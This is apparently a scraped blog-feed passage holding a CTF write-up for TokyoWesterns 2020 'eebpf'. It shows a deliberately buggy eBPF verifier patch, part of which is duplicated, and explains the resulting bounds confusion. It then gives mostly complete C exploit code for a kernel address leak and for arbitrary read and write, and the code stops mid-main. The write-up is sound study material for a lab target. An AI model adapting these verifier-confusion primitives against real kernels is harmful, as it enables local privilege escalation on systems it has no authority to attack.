href="https://gitlab.com/sajjadium/ctf-archives/-/tree/main/ctfs/TokyoWesterns/2019/gnote">https://gitlab.com/sajjadium/ctf-archives/-/tree/main/ctfs/TokyoWesterns/2019/gnote</a></li> </ul> TokyoWesternsCTF2020 eebpf /posts/kernel/write-ups/ctf/tokyowesternsctf2020-eebpf/ Tue, 28 Jan 2025 11:21:15 +0000 /posts/kernel/write-ups/ctf/tokyowesternsctf2020-eebpf/ <hr> <h2 id="problem">Problem</h2> <h3 id="environment">Environment</h3> <ul> <li>kernel version: <code>5.4.58</code></li> <li>unprivileged_bpf_disabled: <code>0</code></li> </ul> <h3 id="patch-file">Patch file</h3> <p>The important part is following:</p> <div class="collapsable-code"> <input id="594782631" type="checkbox" /> <label for="594782631"> <span class="collapsable-code__language">diff</span> <span class="collapsable-code__title">TokyoWesternsCTF2020-eebpf-patch.diff</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-diff" > <code>diff -r ./buildroot-2020.08-rc3/output/build/linux-5.4.58/include/uapi/linux/bpf.h buildroot-2020.08-rc3_original/output/build/linux-5.4.58/include/uapi/linux/bpf.h 27d26 &lt; #define BPF_ALSH 0xe0 /* sign extending arithmetic shift left */ diff -r ./buildroot-2020.08-rc3/output/build/linux-5.4.58/kernel/bpf/tnum.c buildroot-2020.08-rc3_original/output/build/linux-5.4.58/kernel/bpf/tnum.c 42,52d41 &lt; struct tnum tnum_alshift(struct tnum a, u8 min_shift, u8 insn_bitness) &lt; { &lt; if (insn_bitness == 32) &lt; //Never reach here now. &lt; return TNUM((u32)(((s32)a.value) &lt;&lt; min_shift), &lt; (u32)(((s32)a.mask) &lt;&lt; min_shift)); &lt; else &lt; return TNUM((s64)a.value &lt;&lt; min_shift, &lt; (s64)a.mask &lt;&lt; min_shift); &lt; } &lt; diff -r ./buildroot-2020.08-rc3/output/build/linux-5.4.58/kernel/bpf/verifier.c buildroot-2020.08-rc3_original/output/build/linux-5.4.58/kernel/bpf/verifier.c 4867,4897d4866 &lt; case BPF_ALSH: &lt; if (umax_val &gt;= insn_bitness) { &lt; /* Shifts greater than 31 or 63 are undefined. &lt; * This includes shifts by a negative number. &lt; */ &lt; mark_reg_unknown(env, regs, insn-&gt;dst_reg); &lt; break; &lt; } &lt; &lt; /* Upon reaching here, src_known is true and &lt; * umax_val is equal to umin_val. &lt; */ &lt; if (insn_bitness == 32) { &lt; //Now we don&#39;t support 32bit. Cuz im too lazy. &lt; mark_reg_unknown(env, regs, insn-&gt;dst_reg); &lt; break; &lt; } else { &lt; dst_reg-&gt;smin_value &lt;&lt;= umin_val; &lt; dst_reg-&gt;smax_value &lt;&lt;= umin_val; &lt; } &lt; &lt; dst_reg-&gt;var_off = tnum_alshift(dst_reg-&gt;var_off, umin_val, &lt; insn_bitness); &lt; &lt; /* blow away the dst_reg umin_value/umax_value and rely on &lt; * dst_reg var_off to refine the result. &lt; */ &lt; dst_reg-&gt;umin_value = 0; &lt; dst_reg-&gt;umax_value = U64_MAX; &lt; __update_reg_bounds(dst_reg); &lt; break;</code></pre></div> <p>And related location is following:</p> <hr> <h2 id="problem">Problem</h2> <h3 id="environment">Environment</h3> <ul> <li>kernel version: <code>5.4.58</code></li> <li>unprivileged_bpf_disabled: <code>0</code></li> </ul> <h3 id="patch-file">Patch file</h3> <p>The important part is following:</p> <div class="collapsable-code"> <input id="594782631" type="checkbox" /> <label for="594782631"> <span class="collapsable-code__language">diff</span> <span class="collapsable-code__title">TokyoWesternsCTF2020-eebpf-patch.diff</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-diff" > <code>diff -r ./buildroot-2020.08-rc3/output/build/linux-5.4.58/include/uapi/linux/bpf.h buildroot-2020.08-rc3_original/output/build/linux-5.4.58/include/uapi/linux/bpf.h 27d26 &lt; #define BPF_ALSH 0xe0 /* sign extending arithmetic shift left */ diff -r ./buildroot-2020.08-rc3/output/build/linux-5.4.58/kernel/bpf/tnum.c buildroot-2020.08-rc3_original/output/build/linux-5.4.58/kernel/bpf/tnum.c 42,52d41 &lt; struct tnum tnum_alshift(struct tnum a, u8 min_shift, u8 insn_bitness) &lt; { &lt; if (insn_bitness == 32) &lt; //Never reach here now. &lt; return TNUM((u32)(((s32)a.value) &lt;&lt; min_shift), &lt; (u32)(((s32)a.mask) &lt;&lt; min_shift)); &lt; else &lt; return TNUM((s64)a.value &lt;&lt; min_shift, &lt; (s64)a.mask &lt;&lt; min_shift); &lt; } &lt; diff -r ./buildroot-2020.08-rc3/output/build/linux-5.4.58/kernel/bpf/verifier.c buildroot-2020.08-rc3_original/output/build/linux-5.4.58/kernel/bpf/verifier.c 4867,4897d4866 &lt; case BPF_ALSH: &lt; if (umax_val &gt;= insn_bitness) { &lt; /* Shifts greater than 31 or 63 are undefined. &lt; * This includes shifts by a negative number. &lt; */ &lt; mark_reg_unknown(env, regs, insn-&gt;dst_reg); &lt; break; &lt; } &lt; &lt; /* Upon reaching here, src_known is true and &lt; * umax_val is equal to umin_val. &lt; */ &lt; if (insn_bitness == 32) { &lt; //Now we don&#39;t support 32bit. Cuz im too lazy. &lt; mark_reg_unknown(env, regs, insn-&gt;dst_reg); &lt; break; &lt; } else { &lt; dst_reg-&gt;smin_value &lt;&lt;= umin_val; &lt; dst_reg-&gt;smax_value &lt;&lt;= umin_val; &lt; } &lt; &lt; dst_reg-&gt;var_off = tnum_alshift(dst_reg-&gt;var_off, umin_val, &lt; insn_bitness); &lt; &lt; /* blow away the dst_reg umin_value/umax_value and rely on &lt; * dst_reg var_off to refine the result. &lt; */ &lt; dst_reg-&gt;umin_value = 0; &lt; dst_reg-&gt;umax_value = U64_MAX; &lt; __update_reg_bounds(dst_reg); &lt; break;</code></pre></div> <p>And related location is following:</p> <ul> <li><a href="https://elixir.bootlin.com/linux/v5.4.58/source/kernel/bpf/tnum.c#L42"><code>tnum_alshift</code></a></li> <li><a href="https://elixir.bootlin.com/linux/v5.4.58/source/kernel/bpf/verifier.c#L4866">Add verification routine to <code>adjust_scalar_min_max_vals</code></a></li> </ul> <h3 id="vulnerability">Vulnerability</h3> <p>As we can see, when we use <code>BPF_ALSH</code>, <code>dst_reg-&gt;smin_value &lt;&lt;= umin_val; dst_reg-&gt;smax_value &lt;&lt;= umin_val;</code> is executed. And because type of <code>smin_value</code> and <code>smax_value</code> is <code>s64</code>, we can make <code>smin_value &gt; smax_value</code>.</p> <h2 id="exploit">Exploit</h2> <h3 id="making-invalid-range">Making invalid range</h3> <p>My step for making invalid range is following:</p> <ol> <li>Load element from bpf_map (we call it <code>e</code>) <ol> <li>Its actual value is 1.</li> <li>Its tnum may be (.val=0, .mask=0xffffffffffffffff).</li> </ol> </li> <li>Do <code>e</code> &amp; 0x1fffffffffffffff. <ol> <li>Its actual value is 1.</li> <li>Its tnum may be (.val=0, .mask=0x1fffffffffffffff).</li> </ol> </li> <li>Do left shift to <code>e</code> by 3. <ol> <li>Its actual value is 8.</li> <li>Its tnum may be (.val=0, .mask=0xfffffffffffffff8).</li> <li>Its min and max value is 0 and 0xfffffffffffffff8.</li> </ol> </li> <li>Add 8 to <code>e</code>. <ol> <li>It actual value is 0x10.</li> <li>Its min and max value is 8 and 0. <ol> <li>Explained later.</li> </ol> </li> </ol> </li> <li>Add (.val=0, .mask=8; min=0, max=8) to <code>e</code>. <ol> <li>Now <code>e</code> has (actual_value, verification_value) = (0x10, 8).</li> </ol> </li> <li>Substract 8 from <code>e</code>. <ol> <li>Now <code>e</code> has (act_val, veri_val) = (8, 0).</li> </ol> </li> </ol> <h4 id="why-e8-does-make-min8-max0-">Why <code>e</code>+=8 does make min=8, max=0 ??</h4> <p>First, we check related functions (codes):</p> <div class="collapsable-code"> <input id="739216485" type="checkbox" checked /> <label for="739216485"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">TokyoWesternsCTF2020-eebpf-addition_code_path.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>// @ https://elixir.bootlin.com/linux/v5.4.58/source/kernel/bpf/verifier.c#L4600 static int adjust_scalar_min_max_vals(struct bpf_verifier_env *env, struct bpf_insn *insn, struct bpf_reg_state *dst_reg, struct bpf_reg_state src_reg) { // ... case BPF_ADD: ret = sanitize_val_alu(env, insn); if (ret &lt; 0) { verbose(env, &#34;R%d tried to add from different pointers or scalars\n&#34;, dst); return ret; } if (signed_add_overflows(dst_reg-&gt;smin_value, smin_val) || signed_add_overflows(dst_reg-&gt;smax_value, smax_val)) { // ... } else { dst_reg-&gt;smin_value += smin_val; dst_reg-&gt;smax_value += smax_val; } if (dst_reg-&gt;umin_value + umin_val &lt; umin_val || dst_reg-&gt;umax_value + umax_val &lt; umax_val) { dst_reg-&gt;umin_value = 0; dst_reg-&gt;umax_value = U64_MAX; } else { // ... } dst_reg-&gt;var_off = tnum_add(dst_reg-&gt;var_off, src_reg.var_off); break; // ... __reg_deduce_bounds(dst_reg); __reg_bound_offset(dst_reg); return 0; } // @ https://elixir.bootlin.com/linux/v5.4.58/source/kernel/bpf/tnum.c#L62 struct tnum tnum_add(struct tnum a, struct tnum b) { u64 sm, sv, sigma, chi, mu; sm = a.mask + b.mask; sv = a.value + b.value; sigma = sm + sv; chi = sigma ^ sv; mu = chi | a.mask | b.mask; return TNUM(sv &amp; ~mu, mu); } // @ https://elixir.bootlin.com/linux/v5.4.58/source/kernel/bpf/verifier.c#L939 /* Uses signed min/max values to inform unsigned, and vice-versa */ static void __reg_deduce_bounds(struct bpf_reg_state *reg) { /* Learn sign from signed bounds. * If we cannot cross the sign boundary, then signed and unsigned bounds * are the same, so combine. This works even in the negative case, e.g. * -3 s&lt;= x s&lt;= -1 implies 0xf...fd u&lt;= x u&lt;= 0xf...ff. */ if (reg-&gt;smin_value &gt;= 0 || reg-&gt;smax_value &lt; 0) { reg-&gt;smin_value = reg-&gt;umin_value = max_t(u64, reg-&gt;smin_value, reg-&gt;umin_value); reg-&gt;smax_value = reg-&gt;umax_value = min_t(u64, reg-&gt;smax_value, reg-&gt;umax_value); return; } // ... }</code></pre></div> <p>When add 8 to <code>e</code>, <code>e</code> is (smin=umin=0, smax=umax=0xfffffffffffffff8; .val=0, .mask=0xfffffffffffffff8). So and since <code>signed_add_overflows(dst_reg-&gt;smin_value, smin_val) || signed_add_overflows(dst_reg-&gt;smax_value, smax_val)</code> is false and <code>dst_reg-&gt;umin_value + umin_val &lt; umin_val || dst_reg-&gt;umax_value + umax_val &lt; umax_val</code> is true, <code>dst_reg-&gt;smin_value += smin_val; dst_reg-&gt;smax_value += smax_val;</code> and <code>dst_reg-&gt;umin_value = 0; dst_reg-&gt;umax_value = U64_MAX;</code> is executed. Then, <code>e</code> is (smin=8, smax=0, umin=0, umax=U64_MAX).</p> <p>And return value of <code>tnum_add</code> is (.val=0, .mask=0xfffffffffffffff8). So after <code>dst_reg-&gt;var_off = tnum_add(dst_reg-&gt;var_off, src_reg.var_off);</code>, <code>e</code> is (smin=8, smax=0, umin=0, umax=U64_MAX; .val=0, .mask=0xfffffffffffffff8).</p> <p>But in <code>__reg_deduce_bounds</code>, <code>reg-&gt;smin_value &gt;= 0 || reg-&gt;smax_value &lt; 0</code> is true, <code>reg-&gt;smin_value = reg-&gt;umin_value = max_t(u64, reg-&gt;smin_value, reg-&gt;umin_value);</code> and <code>reg-&gt;smax_value = reg-&gt;umax_value = min_t(u64, reg-&gt;smax_value, reg-&gt;umax_value);</code> is performed. Because <code>reg-&gt;smin_value == 8</code>, <code>reg-&gt;umin_value == 0</code>, <code>reg-&gt;smax_value == 0</code> and <code>reg-&gt;umax_value == U64_MAX</code>, register&rsquo;s min and max value is set by <code>reg-&gt;?min_value = max_t(u64, 8, 0)</code> and <code>reg-&gt;?max_value = min_t(u64, 0, U64_MAX)</code>.</p> <p>Because of this reasons, after <code>e</code>+=8, <code>e</code> will be (min=8, max=0).</p> <h3 id="leak-struct-bpf_map-address">Leak <code>struct bpf_map</code> address</h3> <p>In <code>adjust_ptr_min_max_vals</code> function, if <code>off_reg-&gt;smin_value &gt; off_reg-&gt;smax_value</code>, the pointer is marked as unknown. And the type of unknown register is scalar, we can leak its value.</p> <p>See followings:</p> <ul> <li><a href="https://elixir.bootlin.com/linux/v5.4.58/source/kernel/bpf/verifier.c#L4379">https://elixir.bootlin.com/linux/v5.4.58/source/kernel/bpf/verifier.c#L4379</a></li> <li><a href="https://elixir.bootlin.com/linux/v5.4.58/source/kernel/bpf/verifier.c#L999">https://elixir.bootlin.com/linux/v5.4.58/source/kernel/bpf/verifier.c#L999</a></li> </ul> <h3 id="aaraaw-primitives">AAR/AAW primitives</h3> <p>We can use the technique using <code>bpf_skb_load_bytes</code> because of scalar which has invalid range. Using this techinuqe, we can set the value on stack without verification by using invalid <code>len</code> argument. Originally <code>bpf_skb_load_bytes</code> changes values from <code>to</code> to <code>to+len</code>. So, the values are marked as unknown. But with invalid <code>len</code>, we can set values with marked as known (invalid verification).</p> <p>So, we can use this.</p> <h3 id="exploit-code">Exploit code</h3> <div class="collapsable-code"> <input id="276481593" type="checkbox" checked /> <label for="276481593"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">TokyoWesternsCTF2020-eebpf-exploit.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>#include &lt;asm-generic/socket.h&gt; #include &lt;fcntl.h&gt; #include &lt;linux/bpf.h&gt; #include &lt;stdint.h&gt; #include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; #include &lt;string.h&gt; #include &lt;sys/socket.h&gt; #include &lt;sys/syscall.h&gt; #include &lt;sys/types.h&gt; #include &lt;time.h&gt; #include &lt;unistd.h&gt; #include &#34;bpf_insn.h&#34; #define BPF_ALSH 0xe0 #define KERNEL_BASE 0xffffffff81000000 #define BPF_MAP_OPS_OFFSET (0xffffffff81a0dec0 - KERNEL_BASE) #define MODPROBE_OFFSET (0xffffffff81c2e800 - KERNEL_BASE) void get_enter_to_continue(const char* msg) { puts(msg); getchar(); } void fatal(const char* msg) { perror(msg); // get_enter_to_continue(&#34;Press enter to exit...&#34;); exit(-1); } int bpf(int cmd, union bpf_attr* attrs) { return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs)); } int bpf_map_create(int val_size, int max_entries) { union bpf_attr attr = { .map_type = BPF_MAP_TYPE_ARRAY, .key_size = sizeof(int), .value_size = val_size, .max_entries = max_entries, }; int map_fd = bpf(BPF_MAP_CREATE, &amp;attr); if (map_fd &lt; 0) { fatal(&#34;bpf(BPF_MAP_CREATE)&#34;); } return map_fd; } int bpf_map_update(int map_fd, int key, void* pval) { union bpf_attr attr = { .map_fd = map_fd, .key = (uint64_t)&amp;key, .value = (uint64_t)pval, .flags = BPF_ANY, }; int res = bpf(BPF_MAP_UPDATE_ELEM, &amp;attr); if (res &lt; 0) { fatal(&#34;bpf(BPF_MAP_UPDATE_ELEM)&#34;); } return res; } int bpf_map_lookup(int map_fd, int key, void* pval) { union bpf_attr attr = { .map_fd = map_fd, .key = (uint64_t)&amp;key, .value = (uint64_t)pval, .flags = BPF_ANY, }; return bpf(BPF_MAP_LOOKUP_ELEM, &amp;attr); } int mapfd; uint64_t map_addr; static uint64_t leak_bpf_map_addr(int do_print_verifier_log) { char verifier_log[0x10000]; uint64_t val = 0; bpf_map_update(mapfd, 0, &amp;val); struct bpf_insn insns[] = { // BPF_REG_ARG1 == struct __sk_buff // arg1(mapfd) BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd), // arg2(&amp;key) BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x8, 0), BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP), BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x8), // map_lookup_elem(mapfd, &amp;key) BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem), BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), BPF_EXIT_INSN(), BPF_MOV64_REG(BPF_REG_5, BPF_REG_0), BPF_LDX_MEM(BPF_DW, BPF_REG_6, BPF_REG_0, 0), BPF_MOV64_REG( BPF_REG_0, BPF_REG_6), // r0 = r6 == 0 == (.val=0, .mask=0xffffffffffffffff) BPF_ALU64_IMM(BPF_AND, BPF_REG_0, 1), // r0 = r0 &amp; 1 == 0 == (.val=0, .mask=1) BPF_ALU64_IMM( BPF_ALSH, BPF_REG_0, 63), // r0 = r0 &lt;&lt; 63 == 0 == (.val=0, .mask=0x8000000000000000); // smin=0, smax=0x8000000000000000 BPF_MOV64_REG(BPF_REG_1, BPF_REG_5), // r1 = r5 == map_elem BPF_ALU64_REG(BPF_ADD, BPF_REG_1, BPF_REG_0), // r1 = r1 + r0; Because r0&#39;s smin &gt; s0&#39;s smax, // r1 will be marked as unknown. BPF_MOV64_REG(BPF_REG_0, BPF_REG_1), // arg1(mapfd) BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd), // arg2(&amp;key) BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x8, 0), BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP), BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x8), // arg3(&amp;val) BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_0, -0x10), BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP), BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x10), // arg4(flags) BPF_MOV64_IMM(BPF_REG_ARG4, BPF_ANY), // map_update_elem(mapfd, &amp;key, &amp;val, 0) BPF_EMIT_CALL(BPF_FUNC_map_update_elem), BPF_MOV64_IMM(BPF_REG_0, 0), BPF_EXIT_INSN(), }; union bpf_attr prog_attr = { .prog_type = BPF_PROG_TYPE_SOCKET_FILTER, .insn_cnt = sizeof(insns) / sizeof(insns[0]), .insns = (uint64_t)insns, .license = (uint64_t)&#34;GPL v2&#34;, .log_level = 2, .log_size = sizeof(verifier_log), .log_buf = (uint64_t)verifier_log, }; int progfd = bpf(BPF_PROG_LOAD, &amp;prog_attr); if (progfd &lt; 0) { puts(&#34;============[failed reason]============&#34;); printf(&#34;%s&#34;, verifier_log); puts(&#34;============[failed reason]============&#34;); fatal(&#34;bpf(BPF_PROG_LOAD)&#34;); } int socks[2]; if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) { fatal(&#34;socketpair&#34;); } if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;progfd, sizeof(int))) { fatal(&#34;setsockopt&#34;); } // Trigger the BPF program write(socks[1], &#34;UNIGURI&#34;, 7); bpf_map_lookup(mapfd, 0, &amp;val); close(socks[0]); close(socks[1]); close(progfd); if (do_print_verifier_log) { puts(&#34;============[verifier log]============&#34;); printf(&#34;%s&#34;, verifier_log); puts(&#34;============[verifier log]============&#34;); } return val - 0xd0; } static void aaw64(uint64_t addr, uint64_t val) { char verifier_log[0x10000]; uint64_t map_val = 1; bpf_map_update(mapfd, 0, &amp;map_val); struct bpf_insn insns[] = { // BPF_REG_ARG1 == struct __sk_buff BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1, -0x8), // arg1(mapfd) BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd), // arg2(&amp;key) BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0), BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP), BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10), // map_lookup_elem(mapfd, &amp;key) BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem), BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), BPF_EXIT_INSN(), BPF_MOV64_REG(BPF_REG_5, BPF_REG_0), // r5 = map_elem BPF_LDX_MEM(BPF_DW, BPF_REG_6, BPF_REG_0, 0), // r6 = *map_elem == 1 BPF_MOV64_REG( BPF_REG_0, BPF_REG_6), // r0 = r6 == (.val=0, .mask=0xffffffffffffffff) BPF_MOV64_IMM(BPF_REG_1, -1), // r1 = 0xffffffffffffffff BPF_ALU64_IMM(BPF_RSH, BPF_REG_1, 3), // r1 = r1 &gt;&gt; 3 == 0x1fffffffffffffff BPF_ALU64_REG(BPF_AND, BPF_REG_0, BPF_REG_1), // r0 = r0 &amp; r1 == (actual_val=1; .val=0, // .mask=0x1fffffffffffffff) BPF_ALU64_IMM(BPF_ALSH, BPF_REG_0, 3), // r0 = r0 &lt;&lt; 3 == (actual_val=8; .val=0, // .mask=0xfffffffffffffff8; // umin=0, umax=0xfffffffffffffff8) BPF_ALU64_IMM( BPF_REG_0, BPF_ADD, 8), // r0 = r0 + 8 == (actual_val=0x10; .val=0, .mask=0x8; umin=0x8, // umax=0). Because of integer overflow in umax. BPF_MOV64_REG(BPF_REG_1, BPF_REG_6), // r1 = r6 == [map_elem] BPF_ALU64_IMM( BPF_AND, BPF_REG_1, 0x08), // r1 = r1 &amp; 0x08 == (.val=0, .mask=0x8; umin=0, umax=0x8) BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_1), // r0 = r0 + r1 == (umin=0x8, umax=0x8) == // constant 8 (but, it&#39;s actually 0x10) BPF_ALU64_IMM( BPF_ADD, BPF_REG_0, -0x8), // r0 = r0 - 0x8 == constant 0 (but, it&#39;s actually 0x8) BPF_MOV64_REG(BPF_REG_7, BPF_REG_0), // r7 = r0 // From now, r7 is marked as constant 0 but it&#39;s actually 0x08 // arg1(skb) BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08), // arg2(offset) BPF_MOV64_IMM(BPF_REG_ARG2, 0), // arg3(to) = fp-0x20 BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP), // arg3 = fp BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20), // arg3 = arg3(fp)-0x20 BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG3, -0x18), // *(u64*)(fp-0x18) = arg3 == fp-0x20 // arg4(len) BPF_MOV64_REG(BPF_REG_ARG4, BPF_REG_7), // arg4 = r7 == (actual_val=0x8; val=0, mask=0) BPF_ALU64_IMM(BPF_MUL, BPF_REG_ARG4, 1), // arg4 = 1 * arg4 == (actual_val=0x8; val=0, mask=0) BPF_ALU64_IMM( BPF_ADD, BPF_REG_ARG4, 8), // arg4 = arg4 + 1 == (actual_val=0x10; val=0x8, mask=0) // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x8, mask=0)) BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes), // fp-0x18 = addr // arg1(skb) BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08), // arg2(offset) BPF_MOV64_IMM(BPF_REG_ARG2, 0x10), // arg3(to) = addr BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP, -0x18), // arg3 = fp-0x18 == addr // arg4(len) BPF_MOV64_IMM(BPF_REG_ARG4, 8), // skb_load_bytes(skb, 0x10, addr, 8) BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes), BPF_MOV64_IMM(BPF_REG_0, 0), BPF_EXIT_INSN(), }; union bpf_attr prog_attr = { .prog_type = BPF_PROG_TYPE_SOCKET_FILTER, .insn_cnt = sizeof(insns) / sizeof(insns[0]), .insns = (uint64_t)insns, .license = (uint64_t)&#34;GPL v2&#34;, .log_level = 2, .log_size = sizeof(verifier_log), .log_buf = (uint64_t)verifier_log, }; int progfd = bpf(BPF_PROG_LOAD, &amp;prog_attr); if (progfd &lt; 0) { puts(&#34;============[failed reason]============&#34;); printf(&#34;%s&#34;, verifier_log); puts(&#34;============[failed reason]============&#34;); fatal(&#34;bpf(BPF_PROG_LOAD)&#34;); } int socks[2]; if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) { fatal(&#34;socketpair&#34;); } if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;progfd, sizeof(int))) { fatal(&#34;setsockopt&#34;); } uint64_t buf[] = {0xdeadbeefcafebebe, addr, val}; write(socks[1], buf, sizeof(buf)); close(socks[0]); close(socks[1]); close(progfd); } static uint64_t aar64(uint64_t addr) { char verifier_log[0x10000]; uint64_t map_val = 1; bpf_map_update(mapfd, 0, &amp;map_val); struct bpf_insn insns[] = { // BPF_REG_ARG1 == struct __sk_buff BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1, -0x8), // arg1(mapfd) BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd), // arg2(&amp;key) BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0), BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP), BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10), // map_lookup_elem(mapfd, &amp;key) BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem), BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), BPF_EXIT_INSN(), BPF_MOV64_REG(BPF_REG_5, BPF_REG_0), // r5 = map_elem BPF_LDX_MEM(BPF_DW, BPF_REG_6, BPF_REG_0, 0), // r6 = *map_elem == 1 BPF_MOV64_REG( BPF_REG_0, BPF_REG_6), // r0 = r6 == (.val=0, .mask=0xffffffffffffffff) BPF_MOV64_IMM(BPF_REG_1, -1), // r1 = 0xffffffffffffffff BPF_ALU64_IMM(BPF_RSH, BPF_REG_1, 3), // r1 = r1 &gt;&gt; 3 == 0x1fffffffffffffff BPF_ALU64_REG(BPF_AND, BPF_REG_0, BPF_REG_1), // r0 = r0 &amp; r1 == (actual_val=1; .val=0, // .mask=0x1fffffffffffffff) BPF_ALU64_IMM(BPF_ALSH, BPF_REG_0, 3), // r0 = r0 &lt;&lt; 3 == (actual_val=8; .val=0, // .mask=0xfffffffffffffff8; // umin=0, umax=0xfffffffffffffff8) BPF_ALU64_IMM( BPF_REG_0, BPF_ADD, 8), // r0 = r0 + 8 == (actual_val=0x10; .val=0, .mask=0x8; umin=0x8, // umax=0). BPF_MOV64_REG(BPF_REG_1, BPF_REG_6), // r1 = r6 == [map_elem] BPF_ALU64_IMM( BPF_AND, BPF_REG_1, 0x08), // r1 = r1 &amp; 0x08 == (.val=0, .mask=0x8; umin=0, umax=0x8) BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_1), // r0 = r0 + r1 == (umin=0x8, umax=0x8) == // constant 8 (but, it&#39;s actually 0x10) BPF_ALU64_IMM( BPF_ADD, BPF_REG_0, -0x8), // r0 = r0 - 0x8 == constant 0 (but, it&#39;s actually 0x8) BPF_MOV64_REG(BPF_REG_7, BPF_REG_0), // r7 = r0 // From now, r7 is marked as constant 0 but it&#39;s actually 0x08 // arg1(skb) BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08), // arg2(offset) BPF_MOV64_IMM(BPF_REG_ARG2, 0), // arg3(to) = fp-0x20 BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP), // arg3 = fp BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20), // arg3 = arg3(fp)-0x20 BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG3, -0x18), // *(u64*)(fp-0x18) = arg3 == fp-0x20 // arg4(len) BPF_MOV64_REG(BPF_REG_ARG4, BPF_REG_7), // arg4 = r7 == (actual_val=0x8; val=0, mask=0) BPF_ALU64_IMM(BPF_MUL, BPF_REG_ARG4, 1), // arg4 = 1 * arg4 == (actual_val=0x8; val=0, mask=0) BPF_ALU64_IMM( BPF_ADD, BPF_REG_ARG4, 8), // arg4 = arg4 + 1 == (actual_val=0x10; val=0x8, mask=0) // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x8, mask=0)) BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes), // fp-0x18 = addr // arg1(mapfd) BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd), // arg2(&amp;key) BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0), BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP), BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10), // arg3(&amp;val) BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP, -0x18), // arg4(flags) BPF_MOV64_IMM(BPF_REG_ARG4, 0), // map_update_elem(mapfd, &amp;key, &amp;val, 0) BPF_EMIT_CALL(BPF_FUNC_map_update_elem), BPF_MOV64_IMM(BPF_REG_0, 0), BPF_EXIT_INSN(), }; union bpf_attr prog_attr = { .prog_type = BPF_PROG_TYPE_SOCKET_FILTER, .insn_cnt = sizeof(insns) / sizeof(insns[0]), .insns = (uint64_t)insns, .license = (uint64_t)&#34;GPL v2&#34;, .log_level = 2, .log_size = sizeof(verifier_log), .log_buf = (uint64_t)verifier_log, }; int progfd = bpf(BPF_PROG_LOAD, &amp;prog_attr); if (progfd &lt; 0) { puts(&#34;============[failed reason]============&#34;); printf(&#34;%s&#34;, verifier_log); puts(&#34;============[failed reason]============&#34;); fatal(&#34;bpf(BPF_PROG_LOAD)&#34;); } int socks[2]; if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) { fatal(&#34;socketpair&#34;); } if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;progfd, sizeof(int))) { fatal(&#34;setsockopt&#34;); } uint64_t buf[] = {0xdeadbeefcafebebe, addr}; write(socks[1], buf, sizeof(buf)); bpf_map_lookup(mapfd, 0, &amp;map_val); close(socks[0]); close(socks[1]); close(progfd); return map_val; } int main() { mapfd = bpf_map_create(sizeof(uint64_t), 1); 